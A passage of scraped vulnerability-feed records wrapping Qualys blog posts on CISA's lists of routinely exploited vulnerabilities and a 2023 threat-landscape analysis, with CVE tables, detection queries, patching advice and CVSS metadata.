[ProxyLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2021/03/03/microsoft-exchange-server-zero-days-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Exchange Server| RCE \n[CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>)| [ProxyLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2021/03/03/microsoft-exchange-server-zero-days-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Exchange Server| RCE \n[CVE-2021-26084](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084>)| | Atlassian Confluence Server and Data Center| Arbitrary code execution \n[CVE-2021-21972](<https://nvd.nist.gov/vuln/detail/CVE-2021-21972>)| | VMware vSphere Client| RCE \n[CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>)| [ZeroLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2020/09/15/microsoft-netlogon-vulnerability-cve-2020-1472-zerologon-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Netlogon Remote Protocol (MS-NRPC)| Elevation of privilege \n[CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>)| | Microsoft Exchange Server| RCE \n[CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)| | Pulse Secure Pulse Connect Secure| Arbitrary file reading \n[CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>)| | Fortinet FortiOS and FortiProxy| Path traversal \n \n### Highlights of Top Vulnerabilities Cited in CISA 2021 Report\n\nBased on the analysis of this report by the Qualys Research Team, let\u2019s review a few of the top vulnerabilities on the 2021 list and our recommendations for how Qualys enterprise customers can detect and respond to them.\n\n#### Log4Shell Vulnerability\n\nThe Log4Shell vulnerability **(CVE-2021-44228)** was disclosed in December 2021. It was widely exploited by sending a specially crafted code string, which allowed an attacker to execute arbitrary Java code on the server and take complete control of the system. Thousands of products used Log4Shell and were vulnerable to the Log4Shell exploitation.\n\nVisit the [Qualys Log4Shell website](<https://www.qualys.com/log4shell-cve-2021-44228/>) for full details on our response to this threat.\n\n### ProxyShell: Multiple Vulnerabilities\n\nThe multiple vulnerabilities called ProxyShell **(CVE-2021-34523, CVE-2021-34473, CVE-2021-31207)** affect Microsoft Exchange email servers. Successful exploitation of these vulnerabilities in combination (i.e., via "vulnerability chaining") enables a remote actor to execute arbitrary code and privilege escalation.\n\n### ProxyLogon: Multiple Vulnerabilities\n\nThe multiple vulnerabilities named ProxyLogon **(CVE-2021-26855, CVE-2021-26858, CVE-2021-26857, CVE-2021-27065)** also affect Microsoft Exchange email servers. Successful exploitation of these vulnerabilities in combination allows an unauthenticated threat actor to execute arbitrary code on vulnerable Exchange Servers, which enables the attacker to gain persistent access to files, mailboxes, and credentials stored on the servers.\n\n[Read our blog](<https://blog.qualys.com/product-tech/2021/03/10/security-advisory-mitigating-the-risk-of-microsoft-exchange-zero-day-proxylogon-vulnerabilities>) on this threat.\n\n#### Confluence Server and Data Center Vulnerability\n\nAn Object Graph Navigation Library injection vulnerability **(CVE-2021-26084)** exists in Confluence Server that could allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance.\n\n#### Top Vulnerabilities of 2020 Persist\n\nThree additional vulnerabilities **(CVE-2020-1472, CVE-2018-13379, CVE-2019-11510)** were part of the routinely exploited [top vulnerabilities of 2020](<https://www.cisa.gov/uscert/ncas/alerts/aa21-209a>) list but continued to be exploited well into 2021.\n\n### How Can Qualys Help?\n\nThe Qualys Research Team stays on top of CISA\u2019s vulnerability reports by mapping and releasing our QIDs as needed. The goal is to provide our enterprise customers with complete visibility into risk across their organizations.\n\n#### Detect CISA Top 15 Exploited Vulnerabilities using Qualys VMDR\n\n[Qualys VMDR](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) provides coverage for all 15 vulnerabilities described in the CISA report. [Qualys Patch Management](<https://www.qualys.com/apps/patch-management/>) can automatically patch all Windows-related vulnerabilities which account for 60% of the 15 vulnerabilities. Organizations can quickly reduce the risk from these vulnerabilities. Organizations can quickly reduce the risk from these vulnerabilities.\n\nUsing VMDR and Qualys Query Language (QQL) lets you easily detect all your assets that are vulnerable to the top 15.\n\nUse this QQL statement:\n \n \n vulnerabilities.vulnerability.cveIds:[`CVE-2021-44228`, `CVE-2021-40539`, `CVE-2021-34523`, `CVE-2021-34473`, `CVE-2021-31207`, `CVE-2021-27065`, `CVE-2021-26858`, `CVE-2021-26857`, `CVE-2021-26855`, `CVE-2021-26084`, `CVE-2021-21972`, `CVE-2020-1472`, `CVE-2020-0688`, `CVE-2019-11510`, `CVE-2018-13379`]\n\n![](https://blog.qualys.com/wp-content/uploads/2022/05/Vulnerabilities_tab-1.png)View vulnerabilities be severity in Qualys VMDR\n\nQualys Unified Dashboard provides a comprehensive view of the top 15 exploited vulnerabilities as they affect your entire enterprise environment. The dashboard allows the security team to keep track of each vulnerability as they may propagate across multiple assets in your infrastructure.\n\nDashboard CISA: Alert (AA22-117A) | Top 15 Routinely Exploited\n\n![](https://blog.qualys.com/wp-content/uploads/2022/05/Dashboard-1.png)Qualys Unified Dashboard\n\n#### Prioritize CISA Top 15 Exploited Vulnerabilities using Qualys VMDR\n\nQualys VMDR makes it easy to prioritize the top 15 exploited vulnerabilities affecting your company\u2019s internet-facing assets. To do so, apply the tag \u201cInternet Facing Assets\u201d in the Prioritization tab. You can add tags like "Cloud Environments", "Type: Servers", "Web Servers", and "VMDR-Web Servers" to increase your scope of assets.\n\nUse this QQL statement:\n \n \n vulnerabilities.vulnerability.cveIds:[`CVE-2021-44228`, `CVE-2021-40539`, `CVE-2021-34523`, `CVE-2021-34473`, `CVE-2021-31207`, `CVE-2021-27065`, `CVE-2021-26858`, `CVE-2021-26857`, `CVE-2021-26855`, `CVE-2021-26084`, `CVE-2021-21972`, `CVE-2020-1472`, `CVE-2020-0688`, `CVE-2019-11510`, `CVE-2018-13379`]\n\n![](https://blog.qualys.com/wp-content/uploads/2022/05/Prioritized_Tab.png)Prioritizing vulnerabilities for remediation in Qualys VMDR\n\n#### Remediate CISA Top 15 Exploited Vulnerabilities using Qualys VMDR\n\nQualys Patch Management offers out-of-the-box support for patching multiple CISA vulnerabilities. Patch Management also provides patches for many Microsoft, Linux, and third-party application vulnerabilities.\n\nTo view the patchable QIDs, enable the "Show only Patchable" toggle button. After that, you can configure the patch job to patch the relevant QIDs and their respective associated CVEs.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/05/Prioritized_Patch-with-Patch-Job.png)Using Qualys Patch Management to apply patches\n\nQualys Patch Management also provides the ability to deploy custom patches. The flexibility to customize patch deployment allows you to patch all the remaining CVEs in your patching to-do list.\n\nTo get a view of all available patches for CISA\u2019s top 15 exploitable vulnerabilities of 2021, go to the Patch Management application and run this QQL statement in the Patches tab:\n \n \n cve:[`CVE-2021-44228`, `CVE-2021-40539`, `CVE-2021-34523`, `CVE-2021-34473`, `CVE-2021-31207`, `CVE-2021-27065`, `CVE-2021-26858`, `CVE-2021-26857`, `CVE-2021-26855`, `CVE-2021-26084`, `CVE-2021-21972`, `CVE-2020-1472`, `CVE-2020-0688`, `CVE-2019-11510`, `CVE-2018-13379`]\n\n![](https://blog.qualys.com/wp-content/uploads/2022/05/Patch_Management_Patches_tab.png)Viewing available patches in Qualys Patch Management\n\nFor additional patch details about vulnerabilities reported by CISA, please see the [Appendix](<https://www.cisa.gov/uscert/ncas/alerts/aa22-117a>) of the CISA report.\n\n### Getting Started\n\nReady to get started? Learn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-06T12:19:24", "type": "qualysblog", "title": "CISA Alert: Top 15 Routinely Exploited Vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2020-0688", "CVE-2020-1472", "CVE-2021-21972", "CVE-2021-26084", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-40539", "CVE-2021-44228"], "modified": "2022-05-06T12:19:24", "id": "QUALYSBLOG:CAF5B766E6B0E6C1A5ADF56D442E7BB2", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-02T20:34:35", "description": "On July 28, 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [cybersecurity advisory](<https://us-cert.cisa.gov/ncas/alerts/aa21-209a>) detailing the top 30 publicly known vulnerabilities that have been routinely exploited by cyber threat actors in 2020 and 2021. Organizations are advised to prioritize and apply patches or workarounds for these vulnerabilities as soon as possible.\n\nThe advisory states, \u201cIf an organization is unable to update all software shortly after a patch is released, prioritize implementing patches for CVEs that are already known to be exploited or that would be accessible to the largest number of potential attackers (such as internet-facing systems).\u201d\n\nCISA released the advisory in conjunction with the Australian Cyber Security Centre (ACSC), the United Kingdom\u2019s National Cyber Security Centre (NCSC), and the U.S. Federal Bureau of Investigation (FBI).\n\nThe CISA advisory is similar in scope to the October 2020 United States National Security Agency (NSA) [cybersecurity advisory](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>) listing the top 25 known vulnerabilities being actively used by Chinese state-sponsored cyber actors [that security teams can detect and mitigate or remediate](<https://blog.qualys.com/product-tech/2020/10/22/nsa-alert-chinese-state-sponsored-actors-exploit-known-vulnerabilities>) in their infrastructure using Qualys VMDR.\n\n### Top Routinely Exploited Vulnerabilities\n\nHere is the list of top routinely exploited vulnerabilities in 2020 and 2021 along with affected products and associated Qualys VMDR QID(s) for each vulnerability.\n\n**CVE-IDs**| **Affected Products**| **Qualys Detections (QIDs)** \n---|---|--- \nCVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065| Microsoft Exchange| 50107, 50108 \nCVE-2021-22893, CVE-2021-22894, CVE-2021-22899, CVE-2021-22900| Pulse Secure| 38838 \nCVE-2021-27101, CVE-2021-27102, CVE-2021-27103, CVE-2021-27104| Accellion| 38830 \nCVE-2021-21985| VMware| 730102, 216261, 216260, 216259 \nCVE-2018-13379, CVE-2020-12812, CVE-2019-5591| Fortinet| 43702, 43769, 43825 \nCVE-2019-19781| Citrix| 150273, 372305, 372685 \nCVE-2019-11510| Pulse| 38771 \nCVE-2018-13379| Fortinet| 43702 \nCVE-2020-5902| F5- Big IP| 38791, 373106 \nCVE-2020-15505| MobileIron| 13998 \nCVE-2017-11882| Microsoft| 110308 \nCVE-2019-11580| Atlassian| 13525 \nCVE-2018-7600| Drupal| 371954, 150218, 277288, 176337, 11942 \nCVE-2019-18935| Telerik| 150299, 372327 \nCVE-2019-0604| Microsoft| 110330 \nCVE-2020-0787| Microsoft| 91609 \nCVE-2020-1472| Netlogon| 91688 \n \n### Detect CISA\u2019s Top Routinely Exploited Vulnerabilities using Qualys VMDR\n\nQualys released several remote and authenticated detections (QIDs) for the vulnerabilities. You can search for these QIDs in VMDR Dashboard using the following QQL query:\n\n__vulnerabilities.vulnerability.cveIds: [_`_CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27065`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-21985`,` CVE-2018-13379`,`CVE-2020-12812`,`CVE-2019-5591`,`CVE-2019-19781`,`CVE-2019-11510`,`CVE-2018-13379`,`CVE-2020-5902`,`CVE-2020-15505`,`CVE-2017-11882`,`CVE-2019-11580`,`CVE-2019-18935`,`CVE-2019-0604`,`CVE-2020-0787`,`CVE-2020-1472`]__\n\n![](https://blog.qualys.com/wp-content/uploads/2021/07/CISA-VMDR-1070x494.png)\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), customers can effectively prioritize this vulnerability for \u201cActive Attack\u201d RTI:\n\n![](https://blog.qualys.com/wp-content/uploads/2021/07/CISA-prioritization-1070x388.png)\n\nWith VMDR Dashboard, you can track top 30 publicly known exploited vulnerabilities, their impacted hosts, their status and overall management in real time. With trending enabled for dashboard widgets, you can keep track of these vulnerabilities trends in your environment using the [\u201cCISA: Alert (AA21-209A) | Top Exploited\u201d dashboard](<https://success.qualys.com/support/s/article/000006738>).\n\n![](https://blog.qualys.com/wp-content/uploads/2021/07/rtaImage-1070x1838.png)\n\n### Recommendations\n\nAs guided by CISA, one must do the following to protect assets from being exploited:\n\n * Minimize gaps in personnel availability and consistently consume relevant threat intelligence.\n * Organizations\u2019 vigilance team should keep a close eye on indications of compromise (IOCs) as well as strict reporting processes.\n * Regular incident response exercises at the organizational level are always recommended as a proactive approach.\n * Organizations should require multi-factor authentication to remotely access networks from external sources, especially for administrator or privileged accounts.\n * Focus cyber defense resources on patching those vulnerabilities that cyber actors most often use.\n\n### Remediation and Mitigation\n\n * Patch systems and equipment promptly and diligently.\n * Implement rigorous configuration management programs.\n * Disable unnecessary ports, protocols, and services.\n * Enhance monitoring of network and email traffic.\n * Use protection capabilities to stop malicious activity.\n\n### Get Started Now\n\nStart your [_Qualys VMDR trial_](<https://www.qualys.com/subscriptions/vmdr/>) to automatically detect and mitigate or remediate the CISA top 30 publicly known vulnerabilities that have been routinely exploited by cyber threat actors in 2020 and 2021.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-29T00:20:27", "type": "qualysblog", "title": "CISA Alert: Top Routinely Exploited Vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-13379", "CVE-2018-7600", "CVE-2019-0604", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-5591", "CVE-2020-0787", "CVE-2020-12812", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-5902", "CVE-2021-21985", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2021-07-29T00:20:27", "id": "QUALYSBLOG:8DC9B53E981BBE193F6EC369D7FA85F8", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-08T15:22:18", "description": "The [previous blog](<https://blog.qualys.com/product-tech/2023/07/11/an-in-depth-look-at-the-latest-vulnerability-threat-landscape-part-1>) from this three-part series showcased an overview of the vulnerability threat landscape. To summarize quickly, it illustrated the popular methods of exploiting vulnerabilities and the tactical techniques employed by threat actors, malware, and ransomware groups. Perhaps more crucially, we stated that commonly used solutions (CISA KEV/EPSS) often fall short in identifying high-risk vulnerabilities. \n\nIn this blog, we will focus on an **insider's perspective on the threat landscape**, viewing it through the eyes of an attacker. We will examine how quickly vulnerabilities get exploited in the wild, identify popularly sought-after vulnerabilities by threat actors, malware, and ransomware groups, and explore their underlying motives. \n\nWe will also provide insights on what measures to take you can take to safeguard your organizations from these vulnerabilities. \n\nSo, let's dive headfirst into this intriguing world without further ado. \n\n### How Fast Are Vulnerabilities Getting Exploited (Time to CISA KEV)?\n\nWe've already highlighted one of the most noteworthy efforts by the team at CISA - the creation of the known exploited vulnerabilities catalog in our previous blog. Initiated as part of [Binding Operational Directive 22-01 in 2021](<https://www.cisa.gov/news-events/directives/binding-operational-directive-22-01>), this project was born out of the need to minimize risks associated with these vulnerabilities. In its early years, there was a substantial backlog to address. Still, by 2023, the CISA team has had their operation running like a well-oiled machine and is swiftly updating the catalog with newly exploited vulnerabilities as soon as evidence emerges. \n\nSo, let's dive deep into understanding how quickly the vulnerabilities get exploited in the wild, as disclosed by the National Vulnerability Database(NVD).\n\nThe following graph illustrates the average duration it takes to include a vulnerability in the Known Exploited Vulnerabilities (KEV) catalog from when it was published in NVD.\n\nFor those CVEs disclosed in 2023, the gap to **time to KEV was just eight days**.\n\n![Average Time to CISA KEV in days](https://ik.imagekit.io/qualys/wp-content/uploads/2023/07/Fig-1-Average-Time-to-CISA-KEV-in-days-300x782.png)Fig 1. Average Time in Days to CISA KEV Catalog\n\nDefenders, therefore, have limited time to respond to vulnerabilities. The only viable response is through automation to patch these vulnerabilities before attackers can exploit them. Note that the average timeframe mentioned here, as in some instances, vulnerabilities are exploited almost instantly.\n\n### Which Vulnerabilities Are Exploited and by Whom?\n\nSo which vulnerabilities are exploited in the wild? And who is exploiting them? Are there any specific vulnerabilities that are more sought-after than others? If so, which ones?\n\nTo understand these questions, let's examine three main groups of attackers.\n\n * Threat Actor groups\n * Malwares\n * Ransomware groups\n\nAlthough there is some overlap within each group, it appears to favor a slightly different set of vulnerabilities depending on the use case.\n\n## Top Ten Vulnerabilities Exploited by Threat Actors\n\nHere\u2019s a list of the top ten vulnerabilities exploited by threat actors.\n\nThe chart below shows **the number of threat actors known to exploit a given vulnerability**.\n\n[![](https://ik.imagekit.io/qualys/wp-content/uploads/2023/07/Fig-2-Top-10-Vulnerabilities-Exploited-by-Threat-Actors-1070x282.png)](<https://ik.imagekit.io/qualys/wp-content/uploads/2023/07/Fig-2-Top-10-Vulnerabilities-Exploited-by-Threat-Actors.png>)Fig 2. Top Ten Vulnerabilities Exploited by Threat Actors for High-Risk Vulnerabilities\n\n**Title** | **CVE**s | **Threat Actor Count** | **TruRisk Score** **(QVS)** | **Description** \n---|---|---|---|--- \nMicrosoft Office/WordPad Remote Code Execution Vulnerability | CVE-2017-0199 | 53 | 100 | Allows a malicious actor to download Visual Basic script containing PowerShell commands. Works reliably well across a wide attack surface. Popular with [APT Groups](<https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html>). \nMicrosoft Office Equation Editor Remote Code Execution Vulnerability | CVE-2017-11882 | 52 | 100 | Exploits Office's default Equation Editor feature by tricking the user to open a malicious file. This one is the hacking group\u2019s most favorite vulnerability, especially groups such as Cobalt or other malware as you will see in the next section. \nWindows Common Controls Remote Code Execution Vulnerability | CVE-2012-0158 | 45 | 100 | Executes remote code by tricking the user to click on a malicious link or specially crafted malicious file. \nApache Log4j RCE (Log4Shell) | CVE-2021-44228 | 26 | 100 | [Log4Shell](<https://www.qualys.com/log4shell-cve-2021-44228/>). Do we need to say anything more? \nMicrosoft Office Memory Corruption Vulnerability | CVE-2018-0802 | 24 | 100 | Executes remote code by tricking the user to open a specially crafted malicious file in Office or WordPad. \nMicrosoft Exchange Server Remote Code Execution Vulnerability (ProxyLogon) | CVE-2021-26855 | 22 | 100 | Allows an unauthenticated user to run arbitrary commands on the exchange server in its default configuration. Heavily exploited by the [Hafnium](<https://www.microsoft.com/en-us/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) group among others. \nMicrosoft Exchange Server Remote Code Execution Vulnerability (ProxyShell) | CVE-2021-34473 | 20 | 100 | Allows an unauthenticated user to run arbitrary commands on the exchange server. Can be clubbed with other CVE\u2019s CVE-2021-34523 and CVE-2021-31207 making it more attractive to cybercriminals. \nArbitrary file write vulnerability in Exchange | CVE-2021-27065 | 19 | 95 | Requires authentication that can then write arbitrary file write vulnerability in Exchange. Leveraged as part of the attack chain once an attacker has initial access. Exploited by Hafnium group among others. \nMicrosoft Exchange Server Remote Code Execution Vulnerability (ProxyShell) | CVE-2021-34523 | 17 | 100 | Allows an unauthenticated user to run arbitrary commands on the exchange server. Can be chained with other CVE\u2019s CVE-2021-34473 and CVE-2021-31207 making it more attractive to cybercriminals. \nMicrosoft Exchange Server Remote Code Execution Vulnerability (ProxyShell) | CVE-2021-31207 | 17 | 95 | Allows an unauthenticated user to run arbitrary commands on the exchange server. Can be chained with other CVE\u2019s CVE-2021-34473 and CVE-2021-31207 making it more attractive to cybercriminals. \n \nTable 1. Top 10 Vulnerabilities Exploited by Threat Actors for High-Risk Vulnerabilities\n\n## Top Ten Highly Active Threat Actors\n\nNext, let\u2019s talk about some of the most active threat actors known to leverage the maximum number of vulnerabilities as part of their arsenal capable of compromising systems across the globe.\n\n[![](https://ik.imagekit.io/qualys/wp-content/uploads/2023/07/Fig-3-Most-Active-Threat-Actors-1070x275.png)](<https://ik.imagekit.io/qualys/wp-content/uploads/2023/07/Fig-3-Most-Active-Threat-Actors.png>)Fig 3. Most Active Threat Actors for High-Risk Vulnerabilities\n\n**Threat Actor ** | **CVEs Exploited ** | **Description ** \n---|---|--- \nEquation Group** ** | 51 | Uses a variety of malware, including backdoors, trojans, and rootkits, often targeting zero-day vulnerabilities. Such kinds of malware are often challenging to detect and remove. \nFancy Bear** ** | 44 | Best known as APT28 or Sofacy, it uses advanced malware and spear-phishing tactics. The group is also known for using \u201cwatering hole\u201d attacks. In 2016, APT28 reportedly attempted to interfere with the U.S. presidential elections. \nWicked Panda** ** | 30 | Also known by Axiom, Winnti, APT41, or Bronze Atlas. This group conducts financially motivated operations. It's been observed to target healthcare, telecom, technology, and video game industries in 14 countries. \nRicochet Chollima** ** | 26 | Also known as APT37, Reaper, and ScarCruft, they primarily target financial institutions, academics, and journalists. \nLabyrinth Chollima** ** | 24 | This is a sub-group of the Lazarus Group that has been attributed to the Reconnaissance General Bureau. It was reportedly responsible for the November 2014 destructive wiper attack against Sony Pictures Entertainment as part of a known campaign called The Operation Blockbuster campaign by Novetta. \nStardust Chollima** ** | 22 | Also known as BlueNoroff, it is a sub-group of the Lazarus Group and has been attributed to the Reconnaissance General Bureau, target banks, financial institutions, casinos, cryptocurrency exchanges, SWIFT system endpoints, and ATMs in at least 38 countries worldwide. \nCarbon Spider** ** | 22 | Also known as Carbanak, FIN7, and Anunak, this threat actor is a financially motivated threat group that targets the U.S. retail, restaurant, and hospitality sectors, often using point-of-sale malware. \nCozy Bear** ** | 20 | Also known as APT29, often targets government networks in Europe and NATO member countries, research institutes, and think tanks. \nAPT37** ** | 20 | It is also linked to the following campaigns between 2016-2018: Operation Daybreak, Operation Erebus, Golden Time, Evil New Year, Are You Happy? FreeMilk, North Korean Human Rights, and Evil New Year 2018. \n | | \n \nTable 2. Most Active Threat Actors for High-Risk Vulnerabilities \n\n## Top Ten Most Exploited Vulnerabilities by Malware\n\nNow, let\u2019s check some of the commonly exploited vulnerabilities by malware.\n\n[![](https://ik.imagekit.io/qualys/wp-content/uploads/2023/07/Fig-4-Top-10-Vulnerabilities-Exploited-by-Malwares-1070x302.png)](<https://ik.imagekit.io/qualys/wp-content/uploads/2023/07/Fig-4-Top-10-Vulnerabilities-Exploited-by-Malwares.png>)Fig 4. Top Ten Vulnerabilities Exploited by Malware for High-Risk Vulnerabilities\n\nTitle | CVEs | Malware Count | TruRisk Score (QVS) | Description \n---|---|---|---|--- \nMicrosoft Office Equation Editor Remote Code Execution Vulnerability | CVE-2017-11882 | 467 | 100 | The absolute granddaddy of all CVEs most exploited by malware. \nIn the history of CVEs, this would be the most beloved malware CVE of all time. \nMicrosoft Office/WordPad Remote Code Execution Vulnerability | CVE-2017-0199 | 92 | 100 | [Allows a malicious actor to download Visual Basic script containing PowerShell commands. Works reliably well across a wide attack surface. Popular with APT Groups.](<https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html>) \nJava Applet Field Bytecode Verifier Cache RCE | CVE-2012-1723 | 91 | 100 | Exploits the vulnerability in JRE to download and install files of an attacker\u2019s choice onto the system. \nMicrosoft Office Remote Code Execution Vulnerability | CVE-2017-8570 | 52 | 100 | [Executes remote code by tricking the user to open a malicious RTF file. Bypasses the patch from CVE-2017-0199. Known to be used in malware spam campaigns.](<https://www.zscaler.com/blogs/security-research/cve-2017-8570-and-cve-2018-0802-exploits-being-used-spread-lokibot>) \nWindows Graphics Device Interface (GDI) RCE | CVE-2019-0903 | 30 | 93 | Exploits vulnerability in the Graphics Component which is fundamental part of the Windows OS used for rendering graphics. \nMicrosoft Office Memory Corruption Vulnerability | CVE-2018-0802 | 29 | 100 | Exploits a vulnerability that was not patched by CVE-2017-11882. \nMicrosoft Exchange Server Remote Code Execution Vulnerability (ProxyLogon) | CVE-2021-26855 | 19 | 100 | [Allows an unauthenticated user to run arbitrary commands on the exchange server in its default configuration. Heavily exploited by Hafnium group among others.](<https://www.microsoft.com/en-us/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) \nMicrosoft Windows Netlogon Privilege Escalation (ZeroLogon) | CVE-2020-1472 | 17 | 100 | Allows an unauthenticated attacker with network access to a domain controller to completely compromise all Active Directory identity services. \nLets the attacker instantly become an admin on enterprise networks. \nMicrosoft Windows CryptoAPI Spoofing Vulnerability | CVE-2020-0601 | 17 | 95 | Enables attackers to execute spoofing attacks, masquerading malicious programs as legitimate software, apparently authenticated with a genuine digital signature. \nThis essentially allows for the delivery of malware under the guise of legitimate software. \nMicrosoft Exchange Server Remote Code Execution Vulnerability (ProxyShell) | CVE-2021-34473 | 12 | 100 | Allows an unauthenticated user to run arbitrary commands on the exchange server. \nIt can be chained with other CVE\u2019s CVE-2021-34523 and CVE-2021-31207 making it more attractive to cybercriminals. \n \nTable 3. Top Ten Vulnerabilities Exploited by Malware for High-Risk Vulnerabilities\n\n## Top Ten Most Active Malware\n\nAnd here\u2019s a list of the ten most common malware names that are known to exploit vulnerabilities that compromise systems.\n\n[![](https://ik.imagekit.io/qualys/wp-content/uploads/2023/07/Fig-5-Most-Active-Malwares-1070x294.png)](<https://ik.imagekit.io/qualys/wp-content/uploads/2023/07/Fig-5-Most-Active-Malwares.png>)Fig 5. Most Active Malware for High-Risk Vulnerabilities\n\nMalware | CVEs Count | Description \n---|---|--- \nHeuristic | 117 | Heuristic viruses can refer to malware detected by heuristic analysis or the virus Heur. The Invader, which compromises a device\u2019s security and antivirus measures. Some examples of heuristic viruses include adware and Trojans. \nWacatac | 94 | Also known as Trojan: Win32/Wacatac.B, is a trojan horse that is designed to steal personal information, such as passwords, credit card numbers, and other sensitive data. \nPidief | 73 | Pidief malware is a file infector, that can infect executable files, such as .exe files, it will modify the file to execute the Pidief malware. \nSkeeyah | 52 | Skeeyah malware is a file infector that can infect executable files, such as .exe files. It will modify the file in a way that will execute the Skeeyah malware when the file is opened. \nBitrep | 49 | Trojan horse virus that infiltrates a computer via a vulnerability in Adobe Flash. Swifi is downloaded from a malicious website without user knowledge or consent and may cause performance degradation, and security malfunctions leading to unauthorized users gaining remote access \nMeterpreter | 46 | Meterpreter is a malicious trojan-type program that allows cyber criminals to remotely control infected computers, without writing anything to disk. This malware can log keystrokes - recording keyboard input (keys pressed) to steal credentials (logins, passwords) linked with various accounts and personal information. \nSwifi | 42 | Trojan horse virus that infiltrates a computer via a vulnerability in Adobe Flash. Swifi is downloaded from a malicious website without user knowledge or consent, and may cause performance degradation, and security malfunctions leading to unauthorized users gaining remote access \nIFrame | 38 | The iframes are used to inject malicious content into a website and can be spread through malicious websites that contain iframes with malicious content. \nLotoor | 35 | It can infect Android devices, often spread through malicious apps available on third-party app stores. These apps may appear to be legitimate, but they actually contain the Lotoor malware. \nRedirector | 34 | Redirects users to malicious websites without their knowledge or consent. This type of malware can be very dangerous, leading users to download other malicious software or enter personal information. \n \nTable 4. Most Active Malware for High-Risk Vulnerabilities\n\n## Top Ten Vulnerabilities Exploited by Ransomware\n\nLastly, let's examine the vulnerabilities that ransomware tends to exploit. **Ransomware is a particular type of malware that encrypts data on storage systems, rendering them inaccessible unless the victim pays a ransom, typically in Bitcoin.** Since the notorious WannaCry crypto-ransomware incident in May 2017, the use of such malicious software has notably escalated.\n\nThe latest report on such escalating threat involves a data breach during a MOVEit transfer, for which the BlackCat 